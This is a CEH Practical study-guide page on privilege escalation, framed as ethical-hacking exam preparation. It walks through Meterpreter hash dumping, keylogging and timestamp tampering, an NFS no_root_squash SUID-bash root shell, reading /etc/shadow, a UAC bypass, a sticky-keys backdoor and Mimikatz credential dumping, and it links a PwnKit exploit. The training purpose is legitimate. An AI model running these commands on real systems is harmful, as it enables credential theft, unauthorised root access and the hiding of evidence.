CEH Practical Guide
  • Certified Ethical Hacker (CEH v12 and CEH V13) Practical Guide: Complete Study Resources & Tips
  • Module 2. Footprinting and Reconnaissance
    • 1. Footprinting through Search Engines
    • 2. Perform Footprinting Through Internet Research Services
    • 3. Footprinting through Social Networking sites
    • 4. Website Footprinting
    • 5. WHOIS Footprinting
    • 6. DNS Footprinting
    • 7. Network footprinting
    • 8. Email Footprinting
    • 9. Footprinting using footprinting tools
    • 10. Perform Footprinting using AI
  • Module 3. Scanning Networks
    • 1. Host Discovery
    • 2. Port and Service Discovery
    • 3. Perform OS Discovery
    • 4. Scan beyond Firewalls and IDS
    • 5. Network scanning using various tools
    • 6. Perform Network Scanning using AI
  • Module 4. Enumeration
    • 1. Netbios Enumeration (Port 137)
    • 2. SNMP Enumeration (Port 161,162)
    • 3. LDAP Enumeration (Port 389)
    • 4. NFS Enumeration
    • 5. DNS Enumeration
    • 6. SMTP Enumeration
    • 7. RPC, SMB and FTP Enumeration
    • 8. Enumeration using various tools
    • 9. Perform Enumeration using AI
  • Module 5. Vulnerability Assessment
    • 1. Perform Vulnerability Research with Vulnerability Scoring Systems and Databases
    • 2. Perform Vulnerability Assessment using Various Vulnerability Assessment Tools
    • 3. Perform Vulnerability Analysis using AI
  • Module 6. System Hacking
    • 1. Gain access to the system
    • 2. Privilege Escalation
    • 3. Maintain Remote Access and Hide Malicious Activities
    • 4. Clear Logs to hide the Evidence of Compromise
    • 5. Active Directory (AD) Attacks
  • Module 7. Malware Threats
    • 1. Gain access to systems with Trojans
    • 2. Infect the system using Virus
    • 3. Perform Static Malware Analysis
    • 4. Perform Dynamic Malware Analysis
  • Module 8. Sniffing
    • 1. Perform Active Sniffing
    • 2. Perform Network Sniffing using Various Sniffing Tools
    • 3. Detect Network Sniffing
  • Module 9. Social Engineering
    • 1. Perform Social Engineering using tools
    • 2. Detect a Phishing attack
    • 3. Audit Organization security for phishing attacks
    • 4. Social Engineering using AI
  • Module 10. Denial of Service
    • 1. Perform DOS and DDOS with various techniques
    • 2. Detect and Protect DOS and DDOS attacks
  • Module 11. Session Hijacking
    • 1. Perform Session Hijacking
    • 2. Detect Session Hijacking
  • Module 12. Evading IDS, antivirus and Honeypots
    • 1. Intrusion Detection using various tools
    • 2. Evade Firewall using Evasion Techniques
  • Module 13. Hacking Web Servers
    • 1. Footprint the Webserver
    • 2. Perform Webserver attacks
    • 3. Perform a Web Server Hacking using AI
  • Module 14. Hacking Web Applications
    • 1. Footprint the Web Infrastructure
    • 2. Perform Web applications Attacks
    • 3. Detect Web Vulnerabilities using using web application security tools
    • 4. Perform Web Application Hacking using AI
  • Module 15. SQL Injection
    • 1. Perform SQL Injection attacks
    • 2. Detect SQL Vulnerabilities using different tool
    • 3. Perform SQL Injection using AI
  • Module 16. Hacking Wireless Networks
    • 1. Footprint a wireless Network
    • 2. Perform Wireless Traffic Analysis
    • 3. Perform Wireless Attacks
  • Module 17. Hacking Mobile Platforms
    • 1. Hack Android Devices
    • 2. Secure Android Device
  • Module 18. IoT and OT Hacking
    • 1. Footprinting IoT and OT devices
    • 2. Capture and Analyze IoT traffic
    • 3. Perform IoT Attacks
  • Module 19. Cloud Computing
    • 1. Perform Reconnaissance on Azure
    • 2. S3 Bucket Enumeration
    • 3. Exploit S3 buckets
    • 4. Perform Privilege Escalation to Gain Higher Privileges
    • 5. Perform Vulnerability Assessment on Docker Images
  • Module 20. Cryptography
    • 1. Encrypt the Information using Various Cryptography Tools
    • 2. Create a self signed Certificate
    • 3. Perform Disk Encryption
    • 4. Cryptanalysis Using different tools
    • 5. Perform Cryptography using AI
  • Tips for exams
  • Additional Resources
Powered by GitBook
On this page
  • 1. Escalate privileges using Priv Esc tools
  • Dumping hashes in meterpreter
  • 2. Post exploitation using Meterpreter
  • Finding files in meterpreter
  • Hidden files in shell
  • List all running services in shell
  • Other shell commands
  • 3. Linux privilige esc with pkexec
  • 4. Linux priv esc with NFS misconfiguration
  • Configure NFS in Victim
  • In Attacking Machine
  • 5. Escalate privliges bypassing UAC and sticky keys
  • 6. Priv esc using Mimikatz

Was this helpful?

  1. Module 6. System Hacking

2. Privilege Escalation

Privilege Escalation techniques to learn for CEH Practical

Previous1. Gain access to the systemNext3. Maintain Remote Access and Hide Malicious Activities

Last updated 3 months ago

Was this helpful?

1. Escalate privileges using Priv Esc tools

After you have a meterpreter session, use the following command to check the user.

getuid

We can use BeRoot tool to check for further attack vectors.

uploading with meterpreter. Files go to downloads folder by default

upload beroot.exe

Now run shell and then execute the file. It will list the attack vectors.

Note: Windows privileges can be used to escalated privileges. These privileges include SeDebug, SeRestore & SeBackup & SeTakeOwnership, SeTcb & SeCreateToken, SeLoadDriver, and Selmpersonate & SeAssignPrimaryToken. BeRoot lists all available privileges and highlights if you have one of these tokens.

Ghostpack Seatbelt

Gather information with following commands

Seatbelt.exe -group=all -full
Seatbelt.exe -group=system
Seatbelt.exe -group=user
Seatbelt.exe -group=misc

Dumping hashes in meterpreter

hashdump   // or try the following
use post/windows/gather/smart_hashdump

2. Post exploitation using Meterpreter

Useful commands

sysinfo
getuid
ifconfig
pwd \\(mostly downloads folder)
ls
cat
cd
keyscan_start //keylogger
keyscan-dump
idletime

To modify the timestamp MACE (modified, accessed,created,entry) attributes

timestomp secret.ext -m "2/11/2022 8:10:03"

To view timestamp entries

timestomp secret.ext -v

-a accessed

-c created

-e entry modified

Finding files in meterpreter

search -f flag*.txt (in meterpreter)

Hidden files in shell

First get the shell, then use the following command.

dir /a:h

List all running services in shell

sc querytex type=service state=all

Other shell commands

netsh firewall show state \\firewall state
netsh firewall show config
wmic cpu get 
wmic /node:"" product get name,version,vendor
wmic useraccount get name,sid
wmic os where Primary='TRUE' reboot //restarts system

3. Linux privilige esc with pkexec

CVE (2021-4034)

Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).

Download and run the script

4. Linux priv esc with NFS misconfiguration

Configure NFS in Victim

sudo apt install nfs-kernel-server

open /etc/exports file. This file contains the list of shares you want to share in the network. Add the following entry.

/home    *(rw,no_root_squash)

Home directory is shared and root user can perform read/write

restart the server

sudo /etc/init.d/nfs-kernel-server restart

If we run the nmap scan now, port 2049 will appear as open.

In Attacking Machine

Now install NFS commons

sudo apt install nfs-commons

check the mouted folder

showmount -e 192.168.18.110

Now mount the share

mkdir /tmp/nfs
sudo mount -t nfs 19.168.18.110:/home /tmp/nfs

Now move to the directory

cd /tmp/nfs
cp /bin/bash .
chmod +s bash   //allows the group to execute it
ls -la bash

to check free space

sudo df -h

Now ssh into the machine. Move to the shared directory and run bash and we will get the root shell.

cd /home
./bash -p

useful commands post exploitation

id
whoami
cat etc/cronjobs
find / -name *.txt -ls 2>/dev/null  to list all text files in system
route -n  host/network names in binary format

Now copy nano to current directory and then read shadow file

sudo cp /bin/nano .
./nano -p /etc/shadow

To see running processes

ps -ef

To view executable binaries

find / -perm -4000 *.txt -ls 2>/dev/null

5. Escalate privliges bypassing UAC and sticky keys

After you have a meterpreter session background it and then use the following exploit

use exploit/windows/local/bypassuac_fodhelper

Then once you get a new meterpreter session, use the following command

getsystem -t 1

To view the current sessions, you can use the following command.

sessions -i*

Using sticky keys to priv esc on Win 11

After the initial meterpreter session, use the following module.

use post/windows/manage/sticky_keys

Now set the already priv escalated session in options and exploit it.

Now on Windows 11 , sign in with a normal user and once you press the stick keys(shift 5 times), you will get cmd as admin.

6. Priv esc using Mimikatz

Metasploit has built in module for mimikatz call kiwi.

First get a meterpreter session. Escalate privilege using bypassuac.

In meterpreter load the module

load kiwi
help kiwi \\to see help

to dump hashes

lsa_dump_sam

We can also dump LSA Secrets using the following command. LSA secrets are used to manage local system security policy. it may contain passwords, IE passwords, SQL passwords etc

change the password with kiwi with hash without knowing the original password.

password_change -u raj -p 123 -P 9876
password_change -u raj -n <NTLM-hash> -P 1234
GitHub - AlessandroZ/BeRoot: Privilege Escalation Project - Windows / Linux / MacGitHub
GitHub - GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.GitHub
Linux Privilige Escalation full course
GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1dayGitHub
Logo
Linux Privilege Escalation using Misconfigured NFS - Hacking ArticlesHacking Articles
An excellent Tutorial
CEH Practical Preparation Course
Certified Ethical Hacker (CEHv12) Practical hands on LabsUdemy
Logo
Logo
Logo
Logo